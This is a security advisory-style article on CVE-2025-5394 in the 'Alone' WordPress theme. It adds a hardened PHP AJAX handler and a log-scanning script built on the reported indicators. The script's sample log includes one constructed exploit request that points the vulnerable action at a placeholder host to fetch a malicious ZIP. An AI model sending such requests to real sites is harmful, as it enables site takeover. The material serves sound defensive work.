WordPress Theme Security Vulnerability Enables Remote Arbitrary Code Execution

A critical security vulnerability has been discovered in the popular “Alone” WordPress theme that allows unauthenticated attackers to execute arbitrary code remotely and potentially take complete control of affected websites.

The vulnerability, tracked as CVE-2025-5394, affects the charity and non-profit theme, which has been sold more than 9,000 times on ThemeForest.

Vulnerability Details and Timeline

The security flaw stems from a missing authorization check in the theme’s plugin installation functionality, specifically within the alone_import_pack_install_plugin() function.

This allows unauthenticated attackers to make the site fetch and install a malicious ZIP file, disguised as a plugin, from a remote location, which results in remote code execution.

Wordfence researchers discovered that the vulnerable function lacks both capability checks and nonce verification, making it accessible to any visitor through the ‘wp_ajax_nopriv_alone_import_pack_install_plugin’ AJAX action.

Attackers can exploit this by specifying both a plugin ‘slug’ and a remote ‘source’, allowing them to install malicious plugins from external servers.
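The advisory describes the handler as reachable through the wp_ajax_nopriv_ hook with neither a capability check nor nonce verification, and as accepting a caller-supplied 'source' URL. The block below is an added example (not the Alone theme's own code) of how a plugin-installing AJAX handler in a WordPress theme should be structured to avoid those three defects; the hook name, function name and nonce action are assumptions for illustration, while the WordPress core functions used are real.

```php
<?php
/**
 * Added example, not the Alone theme's code. Shows the checks the advisory
 * says the vulnerable handler lacked: (1) no anonymous (nopriv) registration,
 * (2) nonce verification, (3) a capability check, and (4) no caller-supplied
 * download URL. Hook, function and nonce names are hypothetical.
 */

// Register for authenticated users only. Deliberately no
// 'wp_ajax_nopriv_...' variant: installing plugins is never anonymous.
add_action( 'wp_ajax_example_import_pack_install_plugin', 'example_import_pack_install_plugin' );

function example_import_pack_install_plugin() {
    // Nonce: the request must carry a token issued to this user's session.
    // Dies with a 403 on failure.
    check_ajax_referer( 'example_import_pack', 'nonce' );

    // Capability: only users allowed to install plugins proceed.
    if ( ! current_user_can( 'install_plugins' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    // Input: accept only a plugin slug, never a download URL from the client.
    $slug = isset( $_POST['slug'] ) ? sanitize_key( wp_unslash( $_POST['slug'] ) ) : '';
    if ( '' === $slug ) {
        wp_send_json_error( array( 'message' => 'Missing plugin slug.' ), 400 );
    }

    require_once ABSPATH . 'wp-admin/includes/plugin-install.php';
    require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';
    require_once ABSPATH . 'wp-admin/includes/file.php';

    // Source: resolve the package URL server-side from WordPress.org for that
    // slug, so the client cannot point the installer at an arbitrary host.
    $api = plugins_api(
        'plugin_information',
        array( 'slug' => $slug, 'fields' => array( 'sections' => false ) )
    );
    if ( is_wp_error( $api ) || empty( $api->download_link ) ) {
        wp_send_json_error( array( 'message' => 'Unknown plugin slug.' ), 404 );
    }

    $upgrader = new Plugin_Upgrader( new WP_Ajax_Upgrader_Skin() );
    $result   = $upgrader->install( $api->download_link );

    if ( is_wp_error( $result ) || ! $result ) {
        wp_send_json_error( array( 'message' => 'Installation failed.' ), 500 );
    }

    wp_send_json_success( array( 'slug' => $slug ) );
}
```

If a theme must ship plugins that are not on WordPress.org, the same principle applies: map the slug to a package URL from a server-side allowlist the theme controls, rather than reading the URL from the request.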

The vulnerability affects all versions of the Alone theme up to and including version 7.8.3. The vendor released a patched version 7.8.5 on June 16, 2025, following responsible disclosure protocols.

However, security researchers observed that attackers began exploiting this vulnerability on July 12, 2025, two days before the public disclosure on July 14, 2025.

Attribute           Details
CVE ID              CVE-2025-5394
CVSS Score          9.8 (Critical)
Affected Software   Alone – Charity Multipurpose Non-profit WordPress Theme
Affected Versions   <= 7.8.3
Patched Version     7.8.5
Vulnerability Type  Missing Authorization to Unauthenticated Arbitrary File Upload

The Wordfence security team reports blocking over 120,900 exploit attempts targeting this vulnerability since the patch was released.

The attacks primarily originate from IP addresses including 193.84.71.244, 87.120.92.24, and 146.19.213.18, with the first IP accounting for nearly 40,000 blocked requests.

Attackers have been observed installing backdoors, file managers, and scripts that create malicious administrator accounts.

The malicious plugins are often disguised with legitimate-sounding names like “wp-classic-editor.zip” or “background-image-cropper.zip”.

Wordfence Premium, Care, and Response users received firewall protection on May 30, 2025, while free users received protection after the standard 30-day delay on June 29, 2025.

Website administrators using the Alone theme are strongly urged to update to version 7.8.5 immediately and review their plugin directories for any suspicious installations.
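For administrators reviewing a site, the indicators the article gives (the AJAX action name, the three source IPs, and the two disguised package names) can be turned into a simple log check. The block below is an added example, not part of the advisory or Wordfence's tooling: it scans Apache combined-format access-log lines for those indicators. The log lines are constructed for this example, and the hostname in them is a placeholder.

```php
<?php
/**
 * Added example, not from the advisory: flag access-log lines that reference
 * the AJAX action, source IPs or package names named in the article.
 * The sample log lines below are constructed; example.invalid is a placeholder.
 */

// Indicators taken from the advisory text.
const ALONE_AJAX_ACTION    = 'alone_import_pack_install_plugin';
const ALONE_REPORTED_IPS   = array( '193.84.71.244', '87.120.92.24', '146.19.213.18' );
const ALONE_DISGUISED_ZIPS = array( 'wp-classic-editor.zip', 'background-image-cropper.zip' );

// Constructed sample lines in Apache "combined" format.
$sample_log = <<<'LOG'
203.0.113.10 - - [12/Jul/2025:10:01:02 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 61 "-" "Mozilla/5.0"
193.84.71.244 - - [12/Jul/2025:10:02:15 +0000] "GET /wp-admin/admin-ajax.php?action=alone_import_pack_install_plugin&slug=wp-classic-editor&source=http://example.invalid/wp-classic-editor.zip HTTP/1.1" 200 91 "-" "curl/8.0"
198.51.100.7 - - [12/Jul/2025:10:03:44 +0000] "POST /wp-admin/admin-ajax.php?action=alone_import_pack_install_plugin HTTP/1.1" 200 91 "-" "python-requests/2.31"
LOG;

/**
 * Returns one finding per suspicious line: ip, timestamp, method, status and
 * the list of reasons the line matched.
 */
function alone_scan_log_lines( string $log ): array {
    $findings = array();
    // client ip, ident, user, [timestamp], "METHOD target PROTO", status
    $pattern = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/';

    foreach ( preg_split( '/\R/', trim( $log ) ) as $line ) {
        if ( ! preg_match( $pattern, $line, $m ) ) {
            continue; // not a combined-format line
        }
        list( , $ip, $when, $method, $target, $status ) = $m;

        $query = parse_url( $target, PHP_URL_QUERY ) ?? '';
        parse_str( $query, $params );

        $reasons = array();
        if ( ( $params['action'] ?? '' ) === ALONE_AJAX_ACTION ) {
            $reasons[] = 'request to the vulnerable AJAX action';
        }
        if ( in_array( $ip, ALONE_REPORTED_IPS, true ) ) {
            $reasons[] = 'source IP listed in the advisory';
        }
        foreach ( ALONE_DISGUISED_ZIPS as $zip ) {
            if ( false !== stripos( $line, $zip ) ) {
                $reasons[] = "package name {$zip} seen in request";
            }
        }
        if ( $reasons ) {
            $findings[] = compact( 'ip', 'when', 'method', 'status' ) + array( 'reasons' => $reasons );
        }
    }
    return $findings;
}

foreach ( alone_scan_log_lines( $sample_log ) as $f ) {
    printf(
        "%s %s %s status=%s: %s\n",
        $f['when'], $f['ip'], $f['method'], $f['status'], implode( '; ', $f['reasons'] )
    );
}
```

Two caveats for anyone adapting this: admin-ajax.php reads the action from either the query string or the POST body, and access logs do not record POST bodies, so a request that carried everything in the body shows up only as a bare POST to admin-ajax.php. The IP and package-name indicators are also only a snapshot from the article; a clean log does not prove a clean site, which is why the advice above to inspect the plugin directory and the administrator account list still applies.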
